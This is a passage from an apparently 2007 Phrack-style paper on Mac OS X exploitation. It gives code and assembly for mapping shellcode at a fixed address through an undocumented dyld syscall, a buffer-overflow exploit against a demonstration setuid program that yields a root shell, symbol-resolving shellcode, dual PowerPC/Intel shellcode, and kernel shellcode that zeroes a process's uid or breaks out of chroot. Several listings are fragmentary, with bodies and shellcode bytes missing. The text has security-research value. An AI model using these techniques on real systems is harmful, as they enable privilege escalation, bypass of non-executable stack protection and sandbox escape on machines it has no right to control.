chosen for the sample code is described in full in section 2 
of this paper.

The method which I now propose relies on an undocumented the
undocumented Mac OS X system call "shared_region_mapping_np".
This syscall is used at runtime by the dynamic loader (dyld) 
to map widely used libraries across the address space of every 
process on the system; this functionality has many evil uses. 

The file /usr/include/sys/syscalls.h contains the syscall 
number for each of the syscalls. Here is the appropriate 
line in that file which contains our syscall.

	#define SYS_shared_region_map_file_np 299

Here is the prototype for this syscall:

	struct shared_region_map_file_np(
		int fd,
		uint32_t mappingCount,
		user_addr_t mappings, 
		user_addr_t slide_p 

The arguments to this syscall are very simple:

fd             an open file descriptor, providing access to data that 
               we want loaded in memory.
mappingCount   the number of mappings which we want to make from the 
mappings       a pointer to an array of _shared_region_mapping_np
               structs which describe each mapping (see below).
slide_p        determines whether the syscall is allowed to slide
               the mapping around inside the shared region of memory
	       to make it fit.

Here is the struct definition for the elements of the third argument:

	struct _shared_region_mapping_np {
		mach_vm_address_t   	address;
		mach_vm_size_t      	size;
		mach_vm_offset_t    	file_offset;
		vm_prot_t               max_prot;  
		vm_prot_t               init_prot; 

The struct elements shown above can be explained as followed:

address        the address in the shared region where the data should
               be stored.
size           the size of the mapping (in bytes)
file_offset    the offset into the file descriptor to which we must
               seek in order to reach the start of our data.
max_prot       This is the maximum protection of the mapping,
               this value is created by or'ing the #defines:
init_prot      This is the initial protection of the mapping, again
               this is created by or'ing the values mentioned above.

The following #define's describe the shared region in which
we can map our data. They show the various regions within the
0x00000000->0xffffffff address space which are available to
use as shared regions. These are shown as defined as starting
point, followed by size.

#define GLOBAL_SHARED_TEXT_SEGMENT      0x90000000
#define GLOBAL_SHARED_DATA_SEGMENT      0xA0000000
#define GLOBAL_SHARED_SEGMENT_MASK      0xF0000000

#define SHARED_TEXT_REGION_SIZE         0x10000000
#define SHARED_DATA_REGION_SIZE         0x10000000
#define SHARED_ALTERNATE_LOAD_BASE      0x09000000

To reduce the chance that our shellcode offset will be 
stored at an address that does not contain a NULL byte 
(thereby making this technique viable for string based 
overflows), we position the shellcode at the last address in 
the region where a page (0x1000 bytes) can be mapped.  By 
doing so, our shellcode will be stored at the address 

The following code can be used to map some shellcode into
a fixed location by opening the file "/tmp/mapme" and writing 
our shellcode out to it. It then uses the file descriptor
to call the "shared_region_map_file_np" which maps the
code, as well as a bunch of int3's (cc), into the shared

 * [ sharedcode.c ] 
 * by 2007

#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <mach/vm_prot.h>
#include <mach/i386/vm_types.h>
#include <mach/shared_memory_server.h>
#include <string.h>
#include <unistd.h>

#define BASE_ADDR 0x9ffff000
#define PAGESIZE  0x1000
#define FILENAME  "/tmp/mapme"

char dual_sc[] =

// setuid() seteuid()

// ppc execve() code by b-r00t

// seteuid(0);
// setuid(0);
// x86 execve() code / nemo

struct _shared_region_mapping_np {
	mach_vm_address_t   	address;
	mach_vm_size_t      	size;
	mach_vm_offset_t    	file_offset;
	vm_prot_t               max_prot;   /* read/write/execute/COW/ZF */
	vm_prot_t               init_prot;  /* read/write/execute/COW/ZF */

int main(int argc,char **argv)
	int fd;
	struct _shared_region_mapping_np sr;
	chr data[PAGESIZE] = { 0xcc };
	char *ptr = data + PAGESIZE - sizeof(dual_sc);
	sr.address     = BASE_ADDR;
	sr.size        = PAGESIZE;
	sr.file_offset = 0;



	if(write(fd,data,PAGESIZE) != PAGESIZE)



	printf("[+] shellcode at: 0x%x.\n",sr.address + 
					   PAGESIZE - 



When we compile and execute this code, it prints the address of
the shellcode in memory. You can see this below.

	-[nemo@fry:~/code]$ gcc sharedcode.c -o sharedcode
	-[nemo@fry:~/code]$ ./sharedcode 
	[+] shellcode at: 0x9fffff71.

As you can see the address used for our shellcode is 0x9fffff71.
This address, as expected, is free of NULL bytes.

You can test that this procedure has worked as expected by 
starting a new process and connecting to it with gdb.

By jumping to this address using the "jump" command in gdb
our shellcode is executed and a bash prompt is displayed.

	-[nemo@fry:~/code]$ gdb /usr/bin/id
	GNU gdb 6.3.50-20050815 (Apple version gdb-563) 
	(gdb) r
	Starting program: /usr/bin/id 
	^C[Switching to process 752 local thread 0xf03]
	0x8fe01010 in __dyld__dyld_start ()
	(gdb) jump *0x9fffff71
	Continuing at 0x9fffff71.
	(gdb) c

In order to demonstrate how this can be used in an exploit, 
I have created a trivially exploitable program:

	 * exploitme.c

	int main(int ac, char  **av)
		char buf[50] = { 0 };

		if(ac == 2)

		return 1;

Below is the exploit for the above program. 

	 * [ exp.c ]
	 * 2007

	#include <stdio.h>
	#include <stdlib.h>

	#define VULNPROG "./exploitme"
	#define OFFSET 66  
	#define FIXEDADDR 0x9fffff71

	int main(int ac, char **av)
		char evilbuff[OFFSET];
		char *args[] = {VULNPROG,evilbuff,NULL};
		char *env[]  = {"TERM=xterm",NULL};
		long *ptr = (long *)&(evilbuff[OFFSET - 4]);
		*ptr = FIXEDADDR;

		return 1;

As you can see we fill the buffer up with "A"'s, followed by our
return address calculated by sharedcode.c. After the strcpy() occurs 
our stored return address on the stack is overwritten with our new 
return address (0x9fffff71) and our shellcode is executed.

If we chown root /exploitme; chmod +s /exploitme; we can see
that our shellcode is mapped into suid processes, which makes
this technique feasible for local privilege escalation. Also, 
because we control the memory protection on our mapping, we bypass 
non-executable stack protection.

	-[nemo@fry:/]$ ./exp
	fry:/ root# id

One limitation of this technique is that the file you are 
mapping into the shared region must exist on the root file-
system. This is clearly explained in the comment below.

 * The split library is not on the root filesystem.  We don't
 * want to pollute the system-wide ("default") shared region
 * with it.
 * Reject the mapping.  The caller (dyld) should "privatize"
 * (via shared_region_make_private()) the shared region and
 * try to establish the mapping privately for this process.

Another limitation to this technique is that Apple have locked 
down this syscall with the following lines of code:

	 * This system call is for "dyld" only.

Luckily we can beat this magnificent protection by....
completely ignoring it.

--[ 3 - Resolving Symbols From Shellcode

In this section I will demonstrate a method which can be used to 
resolve the address of a symbol from shellcode.

This is useful in remote exploitation where you wish to access 
or modify some of the functionality of the vulnerable program. 
This may also be useful in calling some of the functions in a 
particular shared library in the address space.

The examples in this section are written in Intel assembly, nasm 
syntax. The concepts presented can easily be recreated in 
PowerPC assembler. If anyone takes the time to do this let me 

The method I will describe requires some basic knowledge about
the Mach-O object format and how symbols are stored/resolved. 
I will try to be as verbose as I can, however if more research 
is required check out the Mach-O Runtime document from the 
Apple website. [4]

The process of resolving symbols which I am describing in this
section involves locating the LINKEDIT section in memory.

The LINKEDIT section is broken up into a symbol table (symtab)
and string table (strtab) as follows:


low memory: 0x0
|---(symtab data starts here.)---| 
|<nlist struct>                  |
|<nlist struct>                  |
|<nlist struct>                  |
| ...                            |
|---(strtab data starts here.)---|
|"_mh_execute_header\0"          |
|"dyld_start\0"                  |
|"main"                          |
| ...                            |
himem : 0xffffffff

By locating the start of the string table and the start of the
symbol table relative to the address of the LINKEDIT section
it is then possible to loop through each of the nlist structures
in the symbol table and access their appropriate string in
the string table. I will now run through this technique in fine

To resolve symbols we will start by locating the mach_header in 
memory. This will be the start of our mapped in mach-o image.
One way to find this is to run the "nm" command on our binary
and locate the address of the __mh_execute_header symbol.

Currently on Mac OS X, the executable is simply mapped in at 
the start of the first page. 0x1000. 

We can verify this as follows:

	-[nemo@fry:~]$ nm /bin/sh | grep mh_
	00001000 A __mh_execute_header

	(gdb) x/x 0x1000
	0x1000: 0xfeedface

As you can see the magic number (0xfeedface) is at 0x1000.
This is our Mach-O header. The struct for this is shown 

	struct mach_header 
	    uint32_t magic; 
	    cpu_type_t cputype; 
	    cpu_subtype_t cpusubtype; 
	    uint32_t filetype; 
	    uint32_t ncmds; 
	    uint32_t sizeofcmds; 
	    uint32_t flags; 

In my shellcode I assume that the file we are parsing always
has a LINKEDIT section and a symbol table load command 
(LC_SYMTAB).  This means that I do not bother parsing the
mach_header struct. However if you do not wish to make this 
assumption, it is easy enough to loop ncmds number of times 
while parsing the load commands.

Directly after the mach_header struct in memory are a bunch
of load_commands. Each of these commands begins with a "cmd"
id field, and the size of the command.

Therefore, we start our code by setting ecx to the address of 
the first load command, directly after the mach_header struct 
in memory. This positions us at 0x101c. We then null out some 
of the registers to use later in the code. 

	;# null out some stuff (ebx,edx,eax)
        xor     ebx,ebx
	mul     ebx                            

	;# position ecx past the mach_header.
	xor	ecx,ecx
        mov     word cx,0x101c              

For symbol resolution, we are only interested in LC_SEGMENT 
commands and the LC_SYMTAB. In particular we are looking for
the LINKEDIT LC_SEGMENT struct. This is explained in more 
detail later.

The #define's for these are in /usr/include/mach-o/loader.h
as follows:

	#define LC_SEGMENT      0x1     
		/* segment of this file to be mapped */
	#define LC_SYMTAB       0x2     
		/* link-edit stab symbol table info */

The LC_SYMTAB command uses the following struct:

	struct symtab_command 
	    uint_32 cmd; 
	    uint_32 cmdsize; 
	    uint_32 symoff; 
	    uint_32 nsyms; 
	    uint_32 stroff; 
	    uint_32 strsize; 

The symoff field holds the offset from the start of the file to 
the symbol table. The stroff field holds the offset to the string 
table. Both the symbol table and string table are contained in 
the LINKEDIT section.  

By subtracting the symoff from the stroff we get the offset into 
the LINKEDIT section in which to read our strings. The nsyms 
field can be used as a loop count when enumerating the symtab. 
For the sake of this sample code, however,i have assumed that 
the symbol exists and ignored the nsyms field entirely. 

We find the LC_SYMTAB command simply by looping through and 
checking the "cmd" field for 0x2.

The LINKEDIT section is slightly harder to find; we need to look 
for a load command with the cmd type 0x1 (segment_command), 
then check for the name "__LINKEDIT" in the segname field of
the struct. The segment_command struct is shown below:

	struct segment_command 
	    uint32_t cmd; 
	    uint32_t cmdsize; 
	    char segname[16]; 
	    uint32_t vmaddr; 
	    uint32_t vmsize; 
	    uint32_t fileoff; 
	    uint32_t filesize; 
	    vm_prot_t maxprot; 
	    vm_prot_t initprot; 
	    uint32_t nsects; 
	    uint32_t flags; 

I will now run through an explanation of the assembly code 
used to accomplish this technique.

I have used a trivial state machine to loop through each 
load_command until both the symbol table and LINKEDIT virtual 
addresses have been found. 

First we check which type of load_command each is and then we 
jump to the appropriate handler, if it is one of the types we 

	cmp     byte [ecx],0x2  ;# test for LC_SYMTAB (0x2)
	je      found_lcsymtab

	cmp     byte [ecx],0x1  ;# test for LC_SEGMENT (0x1)
	je      found_lcsegment

The next two instructions add the length field of the 
load_command to our pointer. This positions us over the cmd 
field of the next load_command in memory. We jump back up
to the next_header symbol and compare again.

	add     ecx,[ecx + 0x4]   ;# ecx += length 
	jmp     next_header

The found_lcsymtab handler is called when we have a cmd == 0x2.
We make the assumption that there's only one LC_SYMTAB. We can 
use the fact that if we're here, eax hasn't been set yet and is 0.
By comparing this with edx we can see if the LINKEDIT segment has 
been found. After the cmp, we update eax with the address of the 
LC_SYMTAB. If both the LINKEDIT and LC_SYMTAB sections have been 
found, we jmp to the "found_both" symbol, otherwise we process
the next header.
	cmp     eax,edx    ;# use the fact that eax is 0 to test edx.
	mov     eax,ecx    ;# update eax with current pointer.
	jne     found_both ;# we have found LINKEDIT and LC_SYMTAB
	jmp     next       ;# keep looking for LINKEDIT

The found_lcsegment handler is very similar to the 
found_lcsymtab code. However, since there are many LC_SEGMENT 
commands in most files we need to be sure that we've found 
the __LINKEDIT section.

To do this we add 8 to the struct pointer to get to the 
segname[] string. We then check 2 characters in, skipping
the "__" for the 4 bytes "LINK". 0x4b4e494c accounting for
endian issues. Again, we use the fact that there should 
only be one LINKEDIT section. This means that if we are
past the check for "LINK" edx is 0. We use this to test
eax, to see if the LC_SYMTAB command has been found.
Again if we are done we jmp to found_both, if not back 
up to the "next_header" symbol.

	lea     esi,[ecx + 0x8] ;# get pointer to name
	;# test for "LINK"
	cmp     long [esi + 0x2],0x4b4e494c     
	jne     next            ;# it's not LINKEDIT, NEXT!
	cmp     edx,eax         ;# use zero'ed edx to test eax
	mov     edx,ecx         ;# set edx to current address
	jne     found_both      ;# we're done!
	jmp     next            ;# still need to find 
				;# LC_SYMTAB, continue
				;# EDX = LINKEDIT struct
				;# EAX = LC_SYMTAB struct

Now that we have our pointers to LINKEDIT and LC_SYMTAB, we can 
subtract symtab_command.symoff from symtab_command.stroff to 
obtain the offset of the strings table from the start of LINKEDIT.
By adding this offset to LINKEDIT's virtual address, we have now
calculated the virtual address of the string table in memory.

        mov     edi,[eax + 0x10]       ;# EDI = stroff
        sub     edi,[eax + 0x8]        ;# EDI -= symoff
        mov     esi,[edx + 0x18]       ;# esi = VA of linkedit
        add     edi,esi       ;# add virtual address of LINKEDIT to offset

The LINKEDIT section contains a list of "struct nlist" structures.
Each one corresponds to a symbol. The first union contains an offset
into the string table (which we have the VA for). In order to find the 
symbol we want we simply cycle through the array and offset our
string table pointer to test the string.

	struct nlist 
	    union { 
	    #ifndef __LP64__ 
		char *n_name; 
		int32_t n_strx; 
	    } n_un; 
	    uint8_t n_type; 
	    uint8_t n_sect; 
	    int16_t n_desc; 
	    uint32_t n_value; 

Now that we are able to walk through our nlist structs we are good
to go. However it wouldn't make sense to store the full symbol 
name in our shellcode as this would make the code larger than it 
already is. ;/

I have chosen to steal^H^H^H^Huse skape's "compute_hash" function
from "Understanding Windows Shellcode" [5]. He explains how the 
code works in his paper.

The following code shows a simple loop. First we jump down to the
"hashes" symbol, and call back up to get a pointer to our list of
hashes. We read the first hash in, and then loop through each of
the nlist structures, hashing the symbol found and comparing it
against our precomputed hash.

If the hash is unsuccessful we jump back up to "check_next_hash",
however if it's successful we continue down to the "done" symbol.

;# esi == constant pointer to nlist
;# edi == strtab base

        jmp     hashes
        pop     ecx
        mov     ecx,[ecx]           ;# ecx = first hash     
        push    esi                 ;# save nlist pointer
        push    edi                 ;# save VA of strtable
        mov     esi,[esi]           ;# *esi = offset from strtab to string
        add     esi,edi             ;# add VA of strtab
        xor edi, edi
        xor eax, eax
        test al, al                 ;# test if on the last byte.
        jz compute_hash_finished
        ror edi, 0xd
        add edi, eax
        jmp compute_hash_again
        cmp     edi,ecx
        pop     edi
        pop     esi
        je      done
        lea     esi,[esi + 0xc]     ;# Add sizeof(struct nlist)
        jmp     check_next_hash

Each hash we wish to resolve can be appended after the hashes: symbol.

                                                ;# hash in edi
        call    lookup_symbol_up
        dd	0x8bd2d84d

Now that we have the address of our symbol we're all done and can 
call our function, or modify it as we need.

In order to calculate the hash for our required symbol, I have cut
and paste some of skapes code into a little c progam as follows:

	#include <stdio.h>
	#include <stdlib.h>

	char chsc[] = 

	int main(int ac, char **av)
		long (*hashstr)() = (long (*)())chsc;

		if(ac != 2) {
			fprintf(stderr,"[!] usage: %s <string to hash>\n",*av);

		printf("[+] Hash: 0x%x\n",hashstr(av[1]));

		return 0;

We can run this as shown below to generate our hash:

-[nemo@fry:~/code/kernelsc]$ ./comphash _do_payload
[+] Hash: 0x8bd2d84d

If the symbol we have resolved is a function that we wish to call
there is a little more we must do before this is possible.

Mac OS X's linker, by default, uses lazy binding for external 
symbols. This means that if our intended function calls another
function in an external library, which hasn't been called elsewhere
in the program already, the dynamic linker will try to resolve
the address as you call it.

For example, a call to execve() with lazy binding will be replaced
with a call to dyld_stub_execve() as shown below:

0x1f54 <do_payload+78>: call   0x301b <dyld_stub_execve>

At runtime this function contains one instruction:

call   0x8fe12f70 <__dyld_fast_stub_binding_helper_interface>

This invokes the dyld which resolves the symbol and replaces this
instruction with a jmp to the real code:

jmp    0x9003b7d0 <execve>

The only problem which this causes is that this function requires
the stack pointer to be correctly aligned, otherwise our code will

To do this we simply subtract 0xc from our stack pointer before
calling our function.

	This will not be necessary if the program you are 
	exploiting has been compiled with the -bind_at_load 

Here is the code I have used to make the call.

        mov     eax,[esi + 0x8] ;# eax == value
        xchg esp,edx            ;# annoyingly large
        sub dl,0xc              ;# way to align the stack pointer
        xchg esp,edx            ;# without null bytes.
        call    eax
        xchg esp,edx            ;# annoyingly large
        add dl,0xc              ;# way to fix up the stack pointer
        xchg esp,edx            ;# without null bytes.

I have written a small sample c program to demonstrate this code
in action.

The following code has no call to do_payload(). The shellcode will
resolve the address of this function and call it.

#include <stdio.h>
#include <stdlib.h>

char symresolve[] =
"\x4d\xd8\xd2\x8b"; // HASH

void do_payload()
        char *args[] = {"/usr/bin/id",NULL};
        char *env[]  = {"TERM=xterm",NULL};
        printf("[+] Executing id.\n");

int main(int ac, char **av)
        void (*fp)() = (void (*)())symresolve;
        return 0;

As you can see below this code works as you'd expect.

-[nemo@fry:~]$ ./testsymbols 
[+] Executing id.
uid=501(nemo) gid=501(nemo) groups=501(nemo)

The full assembly listing for the method shown in this section
is shown in the Appendix for this paper.

I originally worked on this method for resolving kernel symbols.

Unfortunately, the kernel jettisons (free()'s) the LINKEDIT section
after it boots. Before doing this, it writes out the mach-o file 
/mach.sym containing the symbol information for the kernel.

If you set the boot flag "keepsyms" the LINKEDIT section will 
not be free()'ed and the symbols will remain in kernel memory.

In this case we can use the code shown in this section, and 
simply scan memory starting from the address 0x1000 until we 
find 0xfeedface. Here is some assembly code to do this:

        xor     eax,eax
        inc     eax
        shl     eax,0xc         ;# eax = 0x1000
        mov     ebx,0xfeedface  ;# ebx = 0xfeedface
        inc     eax
        inc     eax
        inc     eax
        inc     eax             ;# eax += 4
        cmp     ebx,[eax]       ;# if(*eax != ebx) {
        jnz     up              ;#      goto up }

After this is done we can resolve kernel symbols as needed.

--[ 4 - Architecture Spanning Shellcode

Since the move from PowerPC to Intel architecture it has become 
common to find both PowerPC and Intel Macs running Mac OS X in
the wild. On top of this, Mac OS X 10.4 ships with virtualization
technology from Transitive called Rosetta which allows an Intel Mac 
toexecute a PowerPC binary.  This means that even after you've 
finger-printed the architecture of a machine as Intel, there's a 
chance a network facing daemon might be running PowerPC code. This 
poses a challenge when writing remote exploits as it is harder 
incorrectly fingerprinting the architecture of the machine will 
result in failure.

In order to remedy this a technique can be used to create 
shellcode which executes on both Intel and PowerPC architecture.

This technique has been documented in the Phrack article of the same
name as this section [16]. 
I provide a brief explanation here as this technique is used 
throughout the remainder of the paper.

The basic premise of this technique is to find a PowerPC instruction
which, when executed, will simply step forward one instruction. It
must do this without performing any memory access, only changing the
state of the registers. When this instruction is interpreted as Intel
opcodes however, a jump must be performed. This jump must be over the
PowerPC portion of the code and into the Intel instructions. In this 
way the architecture type can be determined.

A suitable PowerPC instruction exists. This is the "rlwnm"

The following is the definition of this instruction, taken from the
PowerPC manual:

(rlwnm) Rotate Left Word then AND with Mask (x'5c00 0000')

rlwnm  	rA,rS,rB,MB,ME	(Rc = 0) 
rlwnm. 	rA,rS,rB,MB,ME	(Rc = 1) 

|10101 |   S    |     A    |    B    |   MB    |   ME    |Rc|
0     5 6     10 11      15 16     20 21     25 26       30 31

This is the rotate left instruction on PowerPC. Basically a mask,
(defined by the bits MB to ME) is applied and the register rS is
rotated rB bits. The result is stored in rA. No memory access is
made by this instruction regardless of the arguments given.

By using the following parameters for this instruction we can
end up with a valid and useful opcode.

	rA = 16
	rS = 28
	rB = 29
	MB = XX
	ME = XX
	rlwnm r16,r28,r29,XX,XX

This leaves us with the opcode:


When this is broken down as Intel code it becomes the following 

nasm > db 0x5f,0x90,0xeb,0xXX
00000000  5F                pop edi	    // move edi to the stack
00000001  90                nop		    // do nothing.
00000002  EBXX              jmp short 0xXX  // jump to our payload.

Here is a small example of how this can be useful.

	char trap[] =
	"\x5f\x90\xeb\x06"	// magic arch selector
	"\x7f\xe0\x00\x08"	// trap ppc instruction
	"\xcc\xcc\xcc\xcc";	// intel: int3 int3 int3 int3

This shellcode when executed on PowerPC architecture will 
execute the "trap" instruction directly below our selector code.
However when this is interpreted as Intel architecture instructions
the "eb 06" causes a short jump to the int3 instructions. The 
reason 06 rather than 04 is used for our jmp short value here is that
eip is pointing to the start of the jmp instruction itself (eb) 
during execution.  Therefore, the jmp instruction needs to compensate
by adding two bytes to the lenth of the PowerPC assembly.

To verify that this multi-arch technique works, here is the output 
of gdb when attached to this process on Intel architecture:

	Program received signal SIGTRAP, Trace/breakpoint trap.
	0x0000201b in trap ()
	(gdb) x/i $pc
	0x201b <trap+11>:       int3  

Here is the same output from a PowerPC version of this binary:

	Program received signal SIGTRAP, Trace/breakpoint trap.
	0x00002018 in trap ()
	(gdb) x/i $pc
	0x2018 <trap+4>:        trap

--[ 5 - Writing Kernel level shellcode

In this section we will look at some techniques for writing shellcode
for use when exploiting kernel level vulnerabilities.

A couple of things to note before we begin. Mac OS X does not share an 
address space for kernel/user space. Both the kernel and userspace
have a 4gb address space each (0x0 -> 0xffffffff).

I did not bother with writing PowerPC code again for most of what I've 
done, if you really want PowerPC code some concepts here will quickly
port others require a little thought ;).

--[ 5.1 - Local privilege escalation

The first type of kernel shellcode we will look at writing is for
local vulnerabilities. The typical objective for local kernel
shellcode is simply to escalate the privileges of our userspace

This topic was covered in noir's excellent paper on OpenBSD kernel 
exploitation in Phrack 60. [6]

A lot of the techniques from noir's paper apply directly to Mac OS X.
noir shows that the sysctl() function can be used to retrieve the  
kinfo_proc struct for a particular process id. As you can see below
one of the members of the kinfo_proc struct is a pointer to the proc 

struct kinfo_proc {
        struct  extern_proc kp_proc;             /* proc structure */
        struct  eproc {
                struct  proc *e_paddr;          /* address of proc */
                struct  session *e_sess;        /* session pointer */
                struct  _pcred e_pcred;         /* process credentials */
                struct  _ucred e_ucred;         /* current credentials */
                struct   vmspace e_vm;          /* address space */
                pid_t   e_ppid;                 /* parent process id */
                pid_t   e_pgid;                 /* process group id */
                short   e_jobc;                 /* job control counter */
                dev_t   e_tdev;                 /* controlling tty dev */
                pid_t   e_tpgid;                /* tty process group id */
                struct  session *e_tsess;       /* tty session pointer */
#define WMESGLEN        7
                char    e_wmesg[WMESGLEN+1];    /* wchan message */
                segsz_t e_xsize;                /* text size */
                short   e_xrssize;              /* text rss */
                short   e_xccount;              /* text references */
                short   e_xswrss;
                int32_t e_flag;
#define EPROC_CTTY      0x01    /* controlling tty vnode active */
#define EPROC_SLEADER   0x02    /* session leader */
#define COMAPT_MAXLOGNAME       12
                char e_login[COMAPT_MAXLOGNAME];/* short setlogin() name*/
                int32_t e_spare[4];
        } kp_eproc;

Ilja van Sprundel mentioned this technique in his talk at Blackhat [7].
Basically, we can use the leaked address "p.kp_eproc.ep_addr" to access
the proc struct for our process in memory.

The following function will return the address of a pid's proc struct 
in the kernel.

long get_addr(pid_t pid) {
        int i, sz = sizeof(struct kinfo_proc), mib[4];
        struct kinfo_proc p;
        mib[0] = CTL_KERN;
        mib[1] = KERN_PROC;
        mib[2] = KERN_PROC_PID;
        mib[3] = pid;
        i = sysctl(&mib, 4, &p, &sz, 0, 0);
        if (i == -1) {

Now that we have the address of our proc struct, we simply have to 
change our uid and/or euid in their respective structures.

Here is a snippet from the proc struct:

struct  proc {
        LIST_ENTRY(proc) p_list;        /* List of all processes. */

        /* substructures: */
        struct  ucred *p_ucred;         /* Process owner's identity. */
        struct  filedesc *p_fd;         /* Ptr to open files structure. */
        struct   pstats *p_stats; /* Accounting/statistics (PROC ONLY). */
        struct  plimit *p_limit;        /* Process limits. */
        struct  sigacts *p_sigacts;
	/* Signal actions, state (PROC ONLY). */

As you can see, following the p_list there is a pointer to the 
ucred struct. This struct is shown below.

struct _ucred {
        int32_t cr_ref;                 /* reference count */
        uid_t   cr_uid;                 /* effective user id */
        short   cr_ngroups;             /* number of groups */
        gid_t   cr_groups[NGROUPS];     /* groups */

By changing the cr_uid field in this struct, we set the euid of
our process. 

The following assembly code will seek to this struct and null
out the ucred cr_uid field. This leaves us with root
privileges on an Intel platform.

        mov     ebx, [0xdeadbeef]       ;# ebx = proc address
        mov     ecx, [ebx + 8]          ;# ecx = ucred
        xor     eax,eax
        mov     [ecx + 12], eax         ;# zero out the euid

To use this code we need to replace the address 0xdeadbeef with
the address of the proc struct which we looked up earlier.

Here is some code from Ilja van Sprundel's talk which does the
same thing on a PowerPC platform.

int kshellcode[] = { 
	0x3ca0aabb, // lis r5, 0xaabb 
	0x60a5ccdd, // ori r5, r5, 0xccdd 
	0x80c5ffa8, // lwz r6, ­88(r5) 
	0x80e60048, // lwz r7, 72(r6) 
	0x39000000, // li r8, 0 
	0x9106004c, // stw r8, 76(r6) 
	0x91060050, // stw r8, 80(r6) 
	0x91060054, // stw r8, 84(r6) 
	0x91060058, // stw r8, 88(r6) 
	0x91070004  // stw r8, 4(r7) 

We can combine the two shellcodes into one architecture 
spanning shellcode. This is a simple process and is 
documented in section 4 of this paper.

The full listing for our multi-arch code is shown
in the Appendix.

On PowerPC processors XNU uses an optimization referred to 
as the "user memory window". This means that the user address
space and the kernel address space share some mappings.

This design is in place for copyin/copyout etc to use.
The user memory window typically starts at 0xe0000000 in both
the kernel and user address space. This can be useful when 
trying to position shellcode for use in local privilege 
escalation vulnerabilities.

--[ 5.2 - Breaking chroot()

Before we look into how we can go about breaking out of
processes after they have used the chroot() syscall, we 
will a look at why, a lot of the time, we don't need to.

-[root@fry:/chroot]# touch file_outside_chroot

-[root@fry:/chroot]# ls -lsa file_outside_chroot 
0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 file_outside_chroot

-[root@fry:/chroot]# chroot demo /bin/sh

-[root@fry:/]# ls -lsa file_outside_chroot
ls: file_outside_chroot: No such file or directory

-[root@fry:/]# pwd                        

-[root@fry:/]# ls -lsa ../file_outside_chroot
0 -rw-r--r--   1 root  admin  0 Jan 29 20:17 ../file_outside_chroot

-[root@fry:/]# ../../usr/sbin/chroot ../../ /bin/sh

-[root@fry:/]# ls -lsa /chroot/file_outside_chroot 
0 -rw-r--r--   1 root  admin  0 Jan 29 12:17 /chroot/file_outside_chroot

As you can see, the /usr/sbin/chroot command which ships
with Mac OS X does not chdir() and therefore does not 
really do very much at all.

The author suggests the following addition be made to the
chroot man page on Mac OS X:

	"Caution: Does not work."

On an unrelated note, this patch would also be suitable for
the setreuid() man page.

I won't spend too much time on this since noir already 
covered it really well in his paper. [6]

Basically as noir mentions, all we need to do to break our 
process out of the chroot() is to set the p->p_fd->fd_rdir
element in our proc struct to NULL.

We can get the address of our proc struct using sysctl as
mentioned earlier.

noir already provides us with the instructions for this:

mov	edx,[ecx + 0x14] 	;# edx = p->p_fd
mov	[edx + 0xc],eax		;# p->p_fd->fd_rdir = 0

--[ 5.3 -  Advancements 

Now that we are familiar with writing shellcode for use
in local exploits, where we already have local access to 
the box, the rest of the kernel related code in this paper
will focus on accomplishing it's task without any userspace 
access required. 

In order to do this, we can utilize the per cpu/task/proc/ 
and thread structures in the kernel. The definitions for 
each of these structures can be found in the osfmk/kern 
and bsd/sys/ directories in various header files.

The first struct which we will look at is the "cpu_data"
struct found in osfmk/i386/cpu_data.h.

I have included the definition for this struct below:

 * Per-cpu data.
 * Each processor has a per-cpu data area which is dereferenced through the
 * using this, in-lines provides single-instruction access to frequently 
 * used members - such as get_cpu_number()/cpu_number(), and 
 * get_active_thread()/ current_thread(). 
 * Cpu data owned by another processor can be accessed using the
 * cpu_datap(cpu_number) macro which uses the cpu_data_ptr[] array of 
 * per-cpu pointers.
typedef struct cpu_data
        struct cpu_data         *cpu_this;        /* pointer to myself */
        thread_t                cpu_active_thread;
        void                    *cpu_int_state;     /* interrupt state */
        vm_offset_t             cpu_active_stack;  /* kernel stack base */
        vm_offset_t             cpu_kernel_stack;  /* kernel stack top */
        vm_offset_t             cpu_int_stack_top;
        int                     cpu_preemption_level;
        int                     cpu_simple_lock_count;
        int                     cpu_interrupt_level;
        int                     cpu_number;             /* Logical CPU */
        int                     cpu_phys_number;        /* Physical CPU */
        cpu_id_t                cpu_id;              /* Platform Expert */
        int                     cpu_signals;            /* IPI events */
        int                     cpu_mcount_off;    /* mcount recursion */
        ast_t                   cpu_pending_ast;
        int                     cpu_type;
        int                     cpu_subtype;
        int                     cpu_threadtype;
        int                     cpu_running;
        uint64_t                rtclock_intr_deadline;
        rtclock_timer_t         rtclock_timer;
        boolean_t               cpu_is64bit;
        task_map_t              cpu_task_map;
        addr64_t                cpu_task_cr3;
        addr64_t                cpu_active_cr3;
        addr64_t                cpu_kernel_cr3;
        cpu_uber_t              cpu_uber;
        void                    *cpu_chud;
        void                    *cpu_console_buf;
        struct cpu_core         *cpu_core;         /* cpu's parent core */
        struct processor        *cpu_processor;
        struct cpu_pmap         *cpu_pmap;
        struct cpu_desc_table   *cpu_desc_tablep;
        struct fake_descriptor  *cpu_ldtp;
        cpu_desc_index_t        cpu_desc_index;
        int                     cpu_ldt;
#ifdef MACH_KDB
        /* XXX Untested: */
        int                     cpu_db_pass_thru;
        vm_offset_t     cpu_db_stacks;
        void            *cpu_kdb_saved_state;
        spl_t           cpu_kdb_saved_ipl;
        int                     cpu_kdb_is_slave;
        int                     cpu_kdb_active;
#endif /* MACH_KDB */
        boolean_t               cpu_iflag;
        boolean_t               cpu_boot_complete;
        int                     cpu_hibernate;
        pmsd                    pms; /* Power Management Stepper control */
        uint64_t            rtcPop; /* when the etimer wants a timer pop */

        vm_offset_t     cpu_copywindow_bas;
        uint64_t        *cpu_copywindow_pdp;

        vm_offset_t     cpu_physwindow_base;
        uint64_t        *cpu_physwindow_ptep;
        void            *cpu_hi_iss;
        boolean_t       cpu_tlb_invalid;

        uint64_t        *cpu_pmHpet; 
	/* Address of the HPET for this processor */
        uint32_t        cpu_pmHpetVec;  
	/* Interrupt vector for HPET for this processor */
/*      Statistics */
        pmStats_t       cpu_pmStats;  
	/* Power management data */
        uint32_t        cpu_hwIntCnt[256];         /* Interrupt counts */

        uint64_t                cpu_dr7; /* debug control register */
} cpu_data_t;

As you can see, this structure contains valuable information 
for our shellcode running in the kernel. We just need to 
figure out how to access it.

The following macro shows how we can access this structure.

/* Macro to generate inline bodies to retrieve per-cpu data fields. */
#define offsetof(TYPE,MEMBER) ((size_t) &((TYPE *)0)->MEMBER)
#define CPU_DATA_GET(member,type)                                       \
        type ret;                                                       \
